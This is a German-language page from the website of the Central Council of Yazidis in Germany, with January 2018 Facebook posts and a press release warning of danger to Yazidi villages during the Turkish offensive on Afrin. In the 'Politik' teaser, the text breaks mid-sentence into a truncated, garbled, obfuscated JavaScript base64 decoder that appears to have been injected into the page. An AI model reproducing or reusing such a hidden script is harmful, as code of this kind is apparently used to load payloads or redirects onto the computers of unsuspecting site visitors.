Mittwoch, Januar 24, 2018

Facebook Posts

+++Vorstand des ZÊD zur Lage der Êzîden in Afrin /Syrien+++

am 22.01.2018 standen unser 1.Vorsitzender Dr. Irfan Ortac und Sheikh Esmat Barimou dem êzidischen Sender Lalish TV Rede und Antwort bezüglich der Bedrohung durch islamistische Terrorgruppen.

Beitrag erfolgte in Kurmanci.
... See MoreSee Less

7 hours ago  ·  

View on Facebook

+++ Aktuelle News zu den türkischen Angriffen auf die Enklave Afrin +++

Die Zivilbevölkerung aus Afrin hat keine Fluchtmöglichkeit mehr. Unseren aktuellen Informationen zufolge, die wir vor ca. 1 Stunde von dort erhalten haben, wurden alle Fluchtwege durch die türkische Armee und ihre dschihadistischen Verbündeten versperrt. Es ist eine Katastrophe! Wir sind über die Zivilbevölkerung sehr besorgt.
... See MoreSee Less

7 hours ago  ·  

View on Facebook

+++Hessischer Rundfunk im Interview mit Dr. Irfan Ortac+++

Für den Hessischen Rundfunk standen unser 1. Vositzender Dr. Irfan Ortac (ZÊD) und Dr. Kamal Sido Rede und Antwort.

Das Interview führte Volker Siefert.
... See MoreSee Less

8 hours ago  ·  

View on Facebook

+++++ Aktuelle News zu den türkischen Angriffen auf die Enklave Afrin +++++

Kirchen in Afrin fordern Unterstützung und Schutz

Neben Eziden forden auch Christen in Afrin um eine Intervention und ein Stoppen der türkischen Angriffe auf ihre Gebiete. In ihren Pressemeldungen weisen sie auf die Gefahr hin, dass das Leben vieler Zivilisten akut gefährdet ist und sie direkten Angriffen ausgesetzt sind.

Die Weltgemeinschaft sollte die Hilfeschreie der Christen und Êzîden ernst nehmen, wir vom Zentralrat sind sehr besorgt.

ZÊD - Zentralrat der Êzîden in Deutschland

Düsseldorf, 22. Januar 2017

#Afrin #عغرين #Efrîn
... See MoreSee Less

1 day ago  ·  

View on Facebook

+++++ Aktuelle News zu den türkischen Angriffen auf die Enklave Afrin +++++

Der ZÊD steht in direktem Kontakt mit den Dorfbewohnern um Afrin. Unseren heutigen Informationen zufolge, gibt es seit zwei Tagen massive Luftangriffe auf die Dörfer um Afrin, wie Qestel Cindo, Qetmê, Alêqînê, Bircê, Feqîra und Basûfanê. Bisher wurden 3 Männer aus Bircê und Feqîra getötet.

Die Dorfbewohner verteidigen ihre Dörfer und nehmen Stellungen um ihre Dörfer ein.

ZÊD - Zentralrat der Êzîden in Deutschland
Düsseldorf, 22. Janauar 2017
... See MoreSee Less

1 day ago  ·  

View on Facebook

+++Pressemitteilung – Dringend +++

„Êzîden fürchten um Ihr Leben“

Nachdem die türkische Armee die ganze Nacht Ortschaften in der Region Afrin bombardiert hat, ist sie heute Morgen mit Bodentruppen in die Region einmarschiert. Zusammen mit der türkischen Armee sind auch in der Region bekannte dschihadistische Gruppen an den kriegerischen Handlungen beteiligt.

Der Zentralrat der Êzîden in Deutschland hat bereits gestern auf die Gefahr hingewiesen und die internationale Gemeinschaft aufgefordert, schnell einzugreifen, um ein Blutbad an Êzîden und anderen Minderheiten zu verhindern.

Der Krisenstab des Zentralrates der Êzîden steht seit gestern stündlich mit den Êzîden in der Region im Kontakt. Die Berichte von heute Morgen sind mehr als besorgniserregend. Dazu der Leiter des Krisenstabes, Sheikh Esmat Barimou: „Die Bewohner in den êzîdischen Ortschaften Qastel Cindo, Baflane, Ali Yeqin, Qatmah, Basoufanê, Khezawiye, Şa Dêrê und Iskan sind akut gefährdet, von den Dschihadisten massakriert zu werden. Die Dschihadisten stehen unmittelbar davor, in diesen Dörfern einzudringen. Es kursieren schon Berichte, wonach diese Gruppen Listen über êzîdische Familien in der Region Afrin führen, die getötet werden sollen. Ich stehe im ständigen Kontakt mit den Bewohnern. Die Angst und Panik verbreitet sich rasant. Im Falle einer Besetzung durch dschihadistische Gruppen und der Türkei wird in der Region weder ein êzîdisches noch ein alevitisches bzw. christliches Leben existieren. Daher appelliere ich eindringlich an Russland und die USA, diesen Krieg sofort zu unterbinden.“

Sheikh Fakhraddin Abdo, Mitglied des Krisenstabes verurteilt den Einmarsch der Türkei aufs Schärfste und sagt: „Es ist nicht von der Hand zu weisen, dass die Türkei mitverantwortlich an dem Bürgerkrieg in Syrien war. Sie will offensichtlich weiterhin vom Krieg leben. Deswegen greift sie die Region an und zerstört die gesellschaftliche Vielfalt in der Region. Wir Êzîden stehen jedoch für die Vielfalt und den Frieden in Afrin und weltweit.“

Auf die Frage, was in den nächsten Tagen geplant sei, sagt Dr. Irfan Ortac, Vorsitzender des Zentralrates: „Seit gestern finden überall in der Welt, u.a. in Deutschland friedliche Protestkundgebungen statt. Ich rufe ausdrücklich alle Ezîden und ihre Freunde dazu auf, sich weiterhin an alle Kundgebungen zu beteiligen. Ferner werde ich morgen mit dem deutschen Außenministerium Kontakt aufnehmen und auf die Gefahr, ähnlich wie im Irak auch Afrin êzîden- und christenfrei zu machen, hinweisen und sie bitten auf ihren Nato-Partnern einzuwirken.
Ich war bis vor wenigen Tagen in Bagdad, um dafür zu kämpfen, dass die Êzîden dort eine Bleibeperspektive haben. Wenn sie jedoch gewaltsam vertrieben werden, wie sollen sie dann in ihrer Heimat bleiben. Diese Frage werde ich dem Außenministerium stellen. Ich bin davon ausgegangen, dass die Êzîden wenigstens in Syrien sicher sind, aber seit gestern bin ich eines Besseren belehrt worden.“

Für Interviewanfragen und Hintergrundgespräche wenden Sie sich bitte an den Zentralrat der Eziden in Deutschland per email: info@zentralrat-eziden.com

#Afrin #عفرين #Efrîn
... See MoreSee Less

2 days ago  ·  

View on Facebook

Politik

Am 29. Januar 2017 wurde in Bielefeld eine neue Interessenvertretung mit dem Namen „Zentralrat der Êzîden in Deutschlandfunction h052c1b60aed(x6){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t4='';var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q7<>4);u1=((sa&15)<>2);q3=((r9&3)<=192)t2+=848;else if(t2==168)t2=1025;else...

Yezidentum

Telim Tolan Mit über 120.000 Menschen sind inzwischen die Jesiden (Jesiden, kurdische Bezeichnung Êzîdî) in der Bundesrepublik vertreten. Insgesamt wird ihre Zahl auf über 1.000.000...

Spendefilm

 

Kettenanhänger

Yezidisches Symbol als Kettenanhänger

c65d552819

Die Menschen in Shingal brauchen eure Hilfe!

Spenden